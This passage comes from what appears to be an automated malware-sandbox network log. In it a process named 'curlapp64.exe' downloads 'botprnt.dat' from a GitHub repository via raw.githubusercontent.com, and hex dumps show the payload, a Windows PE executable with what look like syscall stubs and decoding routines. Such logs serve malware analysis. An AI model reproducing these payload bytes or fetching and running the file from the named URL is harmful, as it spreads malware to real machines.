                                                                                                                              2024-12-10 06:35:13 UTC1378INData Raw: 45 bc 88 42 0c 0f b6 45 bd 88 42 0d 0f b6 45 be 88 42 0e 0f b6 45 bf 88 42 0f 0f b6 45 c0 88 42 10 0f b6 45 c1 88 42 11 0f b6 45 c2 88 42 12 0f b6 45 c3 88 42 13 0f b6 45 c4 88 42 14 0f b6 45 c5 88 42 15 0f b6 45 c6 88 42 16 0f b6 45 c7 88 42 17 0f b6 45 c8 88 42 18 0f b6 45 c9 88 42 19 0f b6 45 ca 88 42 1a 0f b6 45 cb 88 42 1b 0f b6 45 cc 88 42 1c 0f b6 45 cd 88 42 1d 0f b6 45 ce 88 42 1e 0f b6 45 cf 88 42 1f 0f b6 45 d0 88 42 20 0f b6 45 d1 88 42 21 0f b6 45 d2 88 42 22 0f b6 45 d3 88 42 23 0f b6 45 d4 88 42 24 0f b6 45 d5 88 42 25 0f b6 45 d6 88 42 26 0f b6 45 d7 88 42 27 0f b6 45 d8 88 42 28 0f b6 45 d9 88 42 29 c7 85 80 00 00 00 28 00 08 02 65 48 8b 04 25 30 00 00 00 4d 8b c6 ba 08 00 00 00 48 8b 48 60 48 8b 49 30 ff 15 d3 04 09 01 48 89 45 48 48 85
                                                                                                                              Data Ascii: EBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEB EB!EB"EB#EB$EB%EB&EB'EB(EB)(eH%0MHH`HI0HEHH
                                                                                                                              2024-12-10 06:35:13 UTC1378INData Raw: d8 06 41 88 40 25 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 07 41 88 40 26 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 08 41 88 40 27 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 09 41 88 40 28 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0a 41 88 40 29 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0b 41 88 40 2a 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0c 41 88 40 2b 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0d 41 88 40 2c 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0e 66 41 0f 73 d8 0f 41 88 40 2d 66 0f 7e c0 66 41 0f 6f c1 66 0f 73 d8 01 41 88 40 2e 66 44 0f 7e c0 41 88 40 2f 66 44 0f 7e c8 41 88 40 30 66 0f 7e c0 66 41 0f 6f c1 66 0f 73 d8 02 41 88 40 31 66 0f 7e c0 66 41 0f 6f c1 66 0f 73 d8 03 41 88 40 32 66 0f 7e c0 66 41 0f 6f c1 66 0f 73 d8 04 41 88 40 33 66 0f 7e c0 66 41 0f 6f c1
                                                                                                                              Data Ascii: A@%f~fAofsA@&f~fAofsA@'f~fAofsA@(f~fAofsA@)f~fAofsA@*f~fAofsA@+f~fAofsA@,f~fAofsfAsA@-f~fAofsA@.fD~A@/fD~A@0f~fAofsA@1f~fAofsA@2f~fAofsA@3f~fAo
                                                                                                                              2024-12-10 06:35:13 UTC1378INData Raw: 33 d2 33 c9 ff d0 85 c0 78 0d 48 8b 8d 90 03 00 00 ff 15 19 fb 08 01 48 8d 95 90 03 00 00 48 c7 85 90 03 00 00 80 69 67 ff 33 c9 e8 bc 00 00 00 65 48 8b 04 25 30 00 00 00 33 d2 4c 8b 45 58 48 8b 48 60 48 8b 49 30 ff 15 c3 fa 08 01 48 89 7d 58 33 d2 89 7d 50 65 48 8b 04 25 30 00 00 00 4c 8b 45 78 48 8b 48 60 48 8b 49 30 ff 15 9f fa 08 01 48 81 c4 78 04 00 00 5f 5d c3 cc cc cc cc cc 48 83 ec 08 4c 8b c9 4d 85 c0 74 13 48 89 3c 24 48 8b f9 49 8b c8 0f b6 c2 f3 aa 48 8b 3c 24 49 8b c1 48 83 c4 08 c3 cc cc cc cc cc cc cc cc cc 4c 8b d1 8b 05 37 fa 08 01 0f 05 c3 4c 8b d1 8b 05 2f fa 08 01 0f 05 c3 4c 8b d1 8b 05 27 fa 08 01 0f 05 c3 4c 8b d1 8b 05 1f fa 08 01 0f 05 c3 4c 8b d1 8b 05 17 fa 08 01 0f 05 c3 4c 8b d1 8b 05 0f fa 08 01 0f 05 c3 00 00 00 00 00 00 00
                                                                                                                              Data Ascii: 33xHHHig3eH%03LEXHH`HI0H}X3}PeH%0LExHH`HI0Hx_]HLMtH<$HIH<$IHL7L/L'LLL
                                                                                                                              2024-12-10 06:35:13 UTC1378INData Raw: c9 7d fa 59 47 f0 ad d4 a2 af 9c a4 72 c0 b7 fd 93 26 36 3f f7 cc 34 a5 e5 f1 71 d8 31 15 04 c7 23 c3 18 96 05 9a 07 12 80 e2 eb 27 b2 75 09 83 2c 1a 1b 6e 5a a0 52 3b d6 b3 29 e3 2f 84 53 d1 00 ed 20 fc b1 5b 6a cb be 39 4a 4c 58 cf d0 ef aa fb 43 4d 33 85 45 f9 02 7f 50 3c 9f a8 51 a3 40 8f 92 9d 38 f5 bc b6 da 21 10 ff f3 d2 cd 0c 13 ec 5f 97 44 17 c4 a7 7e 3d 64 5d 19 73 60 81 4f dc 22 2a 90 88 46 ee b8 14 de 5e 0b db e0 32 3a 0a 49 06 24 5c c2 d3 ac 62 91 95 e4 79 e7 c8 37 6d 8d d5 4e a9 6c 56 f4 ea 65 7a ae 08 ba 78 25 2e 1c a6 b4 c6 e8 dd 74 1f 4b bd 8b 8a 70 3e b5 66 48 03 f6 0e 61 35 57 b9 86 c1 1d 9e e1 f8 98 11 69 d9 8e 94 9b 1e 87 e9 ce 55 28 df 8c a1 89 0d bf e6 42 68 41 99 2d 0f b0 54 bb 16 52 09 6a d5 30 36 a5 38 bf 40 a3 9e 81 f3 d7 fb 7c
                                                                                                                              Data Ascii: }YGr&6?4q1#'u,nZR;)/S [j9JLXCM3EP<Q@8!_D~=d]s`O"*F^2:I$\by7mNlVezx%.tKp>fHa5WiU(BhA-TRj068@|


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.54972420.233.83.1454436604C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-10 06:35:16 UTC88OUTHEAD /botrunvd01/botdwl/raw/main/botprnt.dat HTTP/1.1
                                                                                                                              Host: github.com
                                                                                                                              Accept: */*
                                                                                                                              2024-12-10 06:35:17 UTC549INHTTP/1.1 302 Found
                                                                                                                              Server: GitHub.com
                                                                                                                              Date: Tue, 10 Dec 2024 06:35:07 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                              Access-Control-Allow-Origin:
                                                                                                                              Location: https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnt.dat
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                              X-Frame-Options: deny
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              2024-12-10 06:35:17 UTC3379INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.549731185.199.109.1334436604C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-10 06:35:18 UTC99OUTHEAD /botrunvd01/botdwl/main/botprnt.dat HTTP/1.1
                                                                                                                              Host: raw.githubusercontent.com
                                                                                                                              Accept: */*
                                                                                                                              2024-12-10 06:35:19 UTC904INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 17375232
                                                                                                                              Cache-Control: max-age=300
                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              ETag: "7cbcbacbd0e618085a41fd0edfbf97987a034ec2cc9fcab6a684b93b3c831467"
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: deny
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              X-GitHub-Request-Id: 4DD6:37C0E5:13E06D:1611DA:6757E121
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Date: Tue, 10 Dec 2024 06:35:19 GMT
                                                                                                                              Via: 1.1 varnish
                                                                                                                              X-Served-By: cache-nyc-kteb1890029-NYC
                                                                                                                              X-Cache: MISS
                                                                                                                              X-Cache-Hits: 0
                                                                                                                              X-Timer: S1733812519.009312,VS0,VE155
                                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                              X-Fastly-Request-ID: 15afb13eae7dd64812d89bafcfe6c65c8c7616eb
                                                                                                                              Expires: Tue, 10 Dec 2024 06:40:19 GMT
                                                                                                                              Source-Age: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.54973720.233.83.1454436604C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-10 06:35:20 UTC87OUTGET /botrunvd01/botdwl/raw/main/botprnt.dat HTTP/1.1
                                                                                                                              Host: github.com
                                                                                                                              Accept: */*
                                                                                                                              2024-12-10 06:35:21 UTC549INHTTP/1.1 302 Found
                                                                                                                              Server: GitHub.com
                                                                                                                              Date: Tue, 10 Dec 2024 06:35:07 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                              Access-Control-Allow-Origin:
                                                                                                                              Location: https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnt.dat
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                              X-Frame-Options: deny
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              2024-12-10 06:35:21 UTC3379INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.549743185.199.109.1334436604C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-10 06:35:22 UTC98OUTGET /botrunvd01/botdwl/main/botprnt.dat HTTP/1.1
                                                                                                                              Host: raw.githubusercontent.com
                                                                                                                              Accept: */*
                                                                                                                              2024-12-10 06:35:23 UTC902INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 17375232
                                                                                                                              Cache-Control: max-age=300
                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              ETag: "7cbcbacbd0e618085a41fd0edfbf97987a034ec2cc9fcab6a684b93b3c831467"
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: deny
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              X-GitHub-Request-Id: A214:3389B3:301995:359EEE:6757E11C
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Date: Tue, 10 Dec 2024 06:35:23 GMT
                                                                                                                              Via: 1.1 varnish
                                                                                                                              X-Served-By: cache-ewr-kewr1740046-EWR
                                                                                                                              X-Cache: HIT
                                                                                                                              X-Cache-Hits: 0
                                                                                                                              X-Timer: S1733812523.136804,VS0,VE1
                                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                              X-Fastly-Request-ID: e9113864c51347f7261ee0caeb536bfa4017cac8
                                                                                                                              Expires: Tue, 10 Dec 2024 06:40:23 GMT
                                                                                                                              Source-Age: 14
                                                                                                                              2024-12-10 06:35:23 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3f f7 f9 e3 7b 96 97 b0 7b 96 97 b0 7b 96 97 b0 09 17 96 b1 7e 96 97 b0 7b 96 96 b0 6a 96 97 b0 f8 10 92 b1 7a 96 97 b0 f8 10 94 b1 7a 96 97 b0 f8 10 97 b1 7a 96 97 b0 f8 10 95 b1 7a 96 97 b0 52 69 63 68 7b 96 97 b0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 ec 70 55 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 2a 00 2a 00 00 00 f2 08 01 00 00 00 00 20 24 00 00 00 10 00
                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?{{{~{jzzzzRich{PEdpUg" ** $
                                                                                                                              2024-12-10 06:35:23 UTC1378INData Raw: 46 fd 88 4e f4 0f b6 4e f5 88 46 f5 0f b6 46 01 88 4e fd 0f b6 4e f9 88 46 f9 0f b6 46 fa 88 4e 01 0f b6 4e f6 88 46 f6 0f b6 46 fe 88 46 fa 0f b6 46 02 88 46 fe 88 4e 02 0f 1f 44 00 00 49 8b c8 ba 04 00 00 00 0f 1f 84 00 00 00 00 00 0f b6 01 48 8d 49 04 42 0f b6 04 18 88 41 fc 48 83 ea 01 75 eb 49 ff c0 49 83 e9 01 75 d2 44 0f b6 c5 48 8b c3 49 c1 e0 04 41 b9 04 00 00 00 4c 2b c3 4c 03 c7 66 66 66 0f 1f 84 00 00 00 00 00 ba 04 00 00 00 66 66 66 0f 1f 84 00 00 00 00 00 41 0f b6 0c 00 30 08 48 ff c0 48 83 ea 01 75 f0 49 83 e9 01 75 da 40 84 ed 74 18 48 8b cb e8 1d 01 00 00 40 80 c5 ff 4c 8d 1d 32 31 00 00 e9 0d ff ff ff b9 10 00 00 00 0f 1f 84 00 00 00 00 00 41 0f b6 04 1f 30 03 48 8d 5b 01 48 83 e9 01 75 ef 0f b6 84 24 80 00 00 00 48 83 c6 10 88 87 b1 00
                                                                                                                              Data Ascii: FNNFFNNFFNNFFFFFNDIHIBAHuIIuDHIAL+LffffffA0HHuIu@tH@L21A0H[Hu$H
                                                                                                                              2024-12-10 06:35:23 UTC1378INData Raw: 0f b6 b4 16 60 42 00 00 49 8d 57 fe 42 0f b6 b4 15 60 42 00 00 42 0f b6 ac 13 60 42 00 00 48 c1 ea 02 42 0f b6 9c 12 60 44 00 00 43 32 9c 11 60 42 00 00 46 8d 04 ad f0 ff ff ff 41 32 1c 08 41 8d 40 01 42 8d 3c ad 00 00 00 00 44 0f b6 cb 88 1c 0f 44 32 34 08 8d 47 01 44 88 34 08 45 0f b6 e6 41 8d 40 02 40 32 34 08 8d 47 02 40 88 34 08 44 0f b6 d6 41 8d 40 03 40 32 2c 08 8d 47 03 40 88 2c 08 44 0f b6 dd 41 8d 45 01 a8 03 75 4a 4c 8d 05 a6 e8 ff ff 40 0f b6 c6 49 8d 57 ff 48 c1 ea 02 46 0f b6 a4 00 60 42 00 00 40 0f b6 c5 46 0f b6 8c 02 60 44 00 00 46 0f b6 94 00 60 42 00 00 0f b6 c3 46 0f b6 9c 00 60 42 00 00 41 0f b6 c6 46 32 8c 00 60 42 00 00 8d 47 04 46 8d 04 ad f4 ff ff ff 45 32 0c 08 44 88 0c 08 41 8d 40 01 44 32 24 08 8d 47 05 44 88 24 08 41 8d 40 02
                                                                                                                              Data Ascii: `BIWB`BB`BHB`DC2`BFA2A@B<DD24GD4EA@@24G@4DA@@2,G@,DAEuJL@IWHF`B@F`DF`BF`BAF2`BGFE2DA@D2$GD$A@
                                                                                                                              2024-12-10 06:35:23 UTC1378INData Raw: 48 89 43 50 49 8b 45 08 48 89 43 58 48 b8 00 00 00 00 00 10 00 00 48 c7 43 68 0a 00 02 00 48 c7 43 70 08 00 00 00 48 89 73 78 48 89 44 24 78 48 8d 44 24 78 48 89 83 98 00 00 00 48 8b 45 78 48 c7 83 88 00 00 00 10 00 02 00 48 c7 83 90 00 00 00 08 00 00 00 48 85 c0 74 1f 48 c7 83 a8 00 00 00 00 00 06 00 48 c7 83 b0 00 00 00 08 00 00 00 48 89 83 b8 00 00 00 eb 04 48 83 03 e0 33 c0 48 89 5c 24 50 0f 57 c0 48 89 45 10 0f 11 45 c0 48 8d 45 c0 48 c7 45 c0 58 00 00 00 48 89 44 24 48 48 8d 54 24 70 48 8b 44 24 60 48 8d 4c 24 68 48 89 44 24 40 41 b9 00 00 00 02 44 89 64 24 38 48 8d 45 88 44 89 64 24 30 45 8b c1 48 89 44 24 28 48 8d 45 88 0f 11 45 d0 48 89 44 24 20 0f 11 45 e0 44 89 65 c8 0f 11 45 f0 c7 45 d0 01 00 00 00 0f 11 45 00 4c 89 64 24 68 4c 89 64 24 70 e8
                                                                                                                              Data Ascii: HCPIEHCXHHChHCpHsxHD$xHD$xHHExHHHtHHHH3H\$PWHEEHEHEXHD$HHT$pHD$`HL$hHD$@ADd$8HEDd$0EHD$(HEEHD$ EDeEEELd$hLd$p
                                                                                                                              2024-12-10 06:35:23 UTC1378INData Raw: 44 24 70 01 00 00 00 c7 44 24 74 51 fd 31 e9 48 89 75 80 c7 45 88 01 00 00 00 c7 45 8c 3f 3e 44 b5 48 89 75 98 c7 45 a0 01 00 00 00 c7 45 a4 92 59 18 40 48 89 75 b0 c7 45 b8 01 00 00 00 c7 45 bc 2e b3 3f 8a 48 89 75 c8 89 75 d0 c7 45 d4 2f 4d 75 13 48 89 75 d8 89 75 e8 c7 45 ec ac da f9 52 48 89 75 f0 89 75 00 c7 45 04 30 fa 79 b7 48 89 75 08 89 75 18 c7 45 1c e9 2e 6f 1c 48 89 75 20 89 75 30 c7 45 34 58 fd e2 09 48 89 75 38 89 75 48 c7 45 4c 7b fa 26 a5 48 89 75 50 4d 85 ff 75 17 be ff ff ff ff 8b c6 48 81 c4 78 04 00 00 41 5f 41 5e 5f 5e 5b 5d c3 49 63 4f 3c 48 8d 85 70 02 00 00 49 03 cf 4c 89 a4 24 70 04 00 00 48 8d 80 80 00 00 00 4c 89 ac 24 68 04 00 00 44 8b f6 8b fe 0f 10 41 18 0f 10 49 28 0f 11 40 80 0f 10 41 38 0f 11 48 90 0f 10 49 48 0f 11 40 a0
                                                                                                                              Data Ascii: D$pD$tQ1HuEE?>DHuEEY@HuEE.?HuuE/MuHuuERHuuE0yHuuE.oHu u0E4XHu8uHEL{&HuPMuHxA_A^_^[]IcO<HpIL$pHL$hDAI(@A8HIH@
                                                                                                                              2024-12-10 06:35:23 UTC1378INData Raw: 05 b1 1a 00 00 e8 2c f7 ff ff f3 0f 7e 0d 94 29 00 00 0f 57 c0 f3 0f 7e 15 91 29 00 00 b9 10 00 00 00 66 0f 60 c8 66 0f 60 d0 f3 0f 7f 4d b0 f3 0f 7f 55 c0 66 90 0f b6 04 19 66 89 44 4d b0 48 ff c1 48 83 f9 14 72 ee 48 8d 1d 77 29 00 00 ba 50 01 00 00 48 8b cb 4c 8d 0d b8 1a 00 00 4c 8d 05 91 1a 00 00 e8 cc f6 ff ff 48 8b cf 66 0f 1f 84 00 00 00 00 00 f3 0f 7e 0c 19 0f 57 c0 66 0f 60 c8 f3 0f 7f 8c 4d 90 00 00 00 f3 0f 7e 4c 19 08 66 0f 60 c8 f3 0f 7f 8c 4d a0 00 00 00 f3 0f 7e 4c 19 10 66 0f 60 c8 f3 0f 7f 8c 4d b0 00 00 00 f3 0f 7e 4c 19 18 66 0f 60 c8 f3 0f 7f 8c 4d c0 00 00 00 48 83 c1 20 48 81 f9 40 01 00 00 72 a5 48 81 f9 4b 01 00 00 73 24 0f 1f 40 00 0f 1f 84 00 00 00 00 00 0f b6 04 19 66 89 84 4d 90 00 00 00 48 ff c1 48 81 f9 4b 01 00 00 72 e8 65
                                                                                                                              Data Ascii: ,~)W~)f`f`MUffDMHHrHw)PHLLHf~Wf`M~Lf`M~Lf`M~Lf`MH H@rHKs$@fMHHKre
                                                                                                                              2024-12-10 06:35:23 UTC1378INData Raw: 45 bc 88 42 0c 0f b6 45 bd 88 42 0d 0f b6 45 be 88 42 0e 0f b6 45 bf 88 42 0f 0f b6 45 c0 88 42 10 0f b6 45 c1 88 42 11 0f b6 45 c2 88 42 12 0f b6 45 c3 88 42 13 0f b6 45 c4 88 42 14 0f b6 45 c5 88 42 15 0f b6 45 c6 88 42 16 0f b6 45 c7 88 42 17 0f b6 45 c8 88 42 18 0f b6 45 c9 88 42 19 0f b6 45 ca 88 42 1a 0f b6 45 cb 88 42 1b 0f b6 45 cc 88 42 1c 0f b6 45 cd 88 42 1d 0f b6 45 ce 88 42 1e 0f b6 45 cf 88 42 1f 0f b6 45 d0 88 42 20 0f b6 45 d1 88 42 21 0f b6 45 d2 88 42 22 0f b6 45 d3 88 42 23 0f b6 45 d4 88 42 24 0f b6 45 d5 88 42 25 0f b6 45 d6 88 42 26 0f b6 45 d7 88 42 27 0f b6 45 d8 88 42 28 0f b6 45 d9 88 42 29 c7 85 80 00 00 00 28 00 08 02 65 48 8b 04 25 30 00 00 00 4d 8b c6 ba 08 00 00 00 48 8b 48 60 48 8b 49 30 ff 15 d3 04 09 01 48 89 45 48 48 85
                                                                                                                              Data Ascii: EBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEBEB EB!EB"EB#EB$EB%EB&EB'EB(EB)(eH%0MHH`HI0HEHH
                                                                                                                              2024-12-10 06:35:23 UTC1378INData Raw: d8 06 41 88 40 25 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 07 41 88 40 26 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 08 41 88 40 27 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 09 41 88 40 28 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0a 41 88 40 29 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0b 41 88 40 2a 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0c 41 88 40 2b 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0d 41 88 40 2c 66 0f 7e c0 66 41 0f 6f c0 66 0f 73 d8 0e 66 41 0f 73 d8 0f 41 88 40 2d 66 0f 7e c0 66 41 0f 6f c1 66 0f 73 d8 01 41 88 40 2e 66 44 0f 7e c0 41 88 40 2f 66 44 0f 7e c8 41 88 40 30 66 0f 7e c0 66 41 0f 6f c1 66 0f 73 d8 02 41 88 40 31 66 0f 7e c0 66 41 0f 6f c1 66 0f 73 d8 03 41 88 40 32 66 0f 7e c0 66 41 0f 6f c1 66 0f 73 d8 04 41 88 40 33 66 0f 7e c0 66 41 0f 6f c1
                                                                                                                              Data Ascii: A@%f~fAofsA@&f~fAofsA@'f~fAofsA@(f~fAofsA@)f~fAofsA@*f~fAofsA@+f~fAofsA@,f~fAofsfAsA@-f~fAofsA@.fD~A@/fD~A@0f~fAofsA@1f~fAofsA@2f~fAofsA@3f~fAo
                                                                                                                              2024-12-10 06:35:23 UTC1378INData Raw: 33 d2 33 c9 ff d0 85 c0 78 0d 48 8b 8d 90 03 00 00 ff 15 19 fb 08 01 48 8d 95 90 03 00 00 48 c7 85 90 03 00 00 80 69 67 ff 33 c9 e8 bc 00 00 00 65 48 8b 04 25 30 00 00 00 33 d2 4c 8b 45 58 48 8b 48 60 48 8b 49 30 ff 15 c3 fa 08 01 48 89 7d 58 33 d2 89 7d 50 65 48 8b 04 25 30 00 00 00 4c 8b 45 78 48 8b 48 60 48 8b 49 30 ff 15 9f fa 08 01 48 81 c4 78 04 00 00 5f 5d c3 cc cc cc cc cc 48 83 ec 08 4c 8b c9 4d 85 c0 74 13 48 89 3c 24 48 8b f9 49 8b c8 0f b6 c2 f3 aa 48 8b 3c 24 49 8b c1 48 83 c4 08 c3 cc cc cc cc cc cc cc cc cc 4c 8b d1 8b 05 37 fa 08 01 0f 05 c3 4c 8b d1 8b 05 2f fa 08 01 0f 05 c3 4c 8b d1 8b 05 27 fa 08 01 0f 05 c3 4c 8b d1 8b 05 1f fa 08 01 0f 05 c3 4c 8b d1 8b 05 17 fa 08 01 0f 05 c3 4c 8b d1 8b 05 0f fa 08 01 0f 05 c3 00 00 00 00 00 00 00
                                                                                                                              Data Ascii: 33xHHHig3eH%03LEXHH`HI0H}X3}PeH%0LExHH`HI0Hx_]HLMtH<$HIH<$IHL7L/L'LLL
                                                                                                                              2024-12-10 06:35:23 UTC1378INData Raw: c9 7d fa 59 47 f0 ad d4 a2 af 9c a4 72 c0 b7 fd 93 26 36 3f f7 cc 34 a5 e5 f1 71 d8 31 15 04 c7 23 c3 18 96 05 9a 07 12 80 e2 eb 27 b2 75 09 83 2c 1a 1b 6e 5a a0 52 3b d6 b3 29 e3 2f 84 53 d1 00 ed 20 fc b1 5b 6a cb be 39 4a 4c 58 cf d0 ef aa fb 43 4d 33 85 45 f9 02 7f 50 3c 9f a8 51 a3 40 8f 92 9d 38 f5 bc b6 da 21 10 ff f3 d2 cd 0c 13 ec 5f 97 44 17 c4 a7 7e 3d 64 5d 19 73 60 81 4f dc 22 2a 90 88 46 ee b8 14 de 5e 0b db e0 32 3a 0a 49 06 24 5c c2 d3 ac 62 91 95 e4 79 e7 c8 37 6d 8d d5 4e a9 6c 56 f4 ea 65 7a ae 08 ba 78 25 2e 1c a6 b4 c6 e8 dd 74 1f 4b bd 8b 8a 70 3e b5 66 48 03 f6 0e 61 35 57 b9 86 c1 1d 9e e1 f8 98 11 69 d9 8e 94 9b 1e 87 e9 ce 55 28 df 8c a1 89 0d bf e6 42 68 41 99 2d 0f b0 54 bb 16 52 09 6a d5 30 36 a5 38 bf 40 a3 9e 81 f3 d7 fb 7c
                                                                                                                              Data Ascii: }YGr&6?4q1#'u,nZR;)/S [j9JLXCM3EP<Q@8!_D~=d]s`O"*F^2:I$\by7mNlVezx%.tKp>fHa5WiU(BhA-TRj068@|


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.54975120.233.83.1454431264C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              TimestampBytes transferredDirectionData
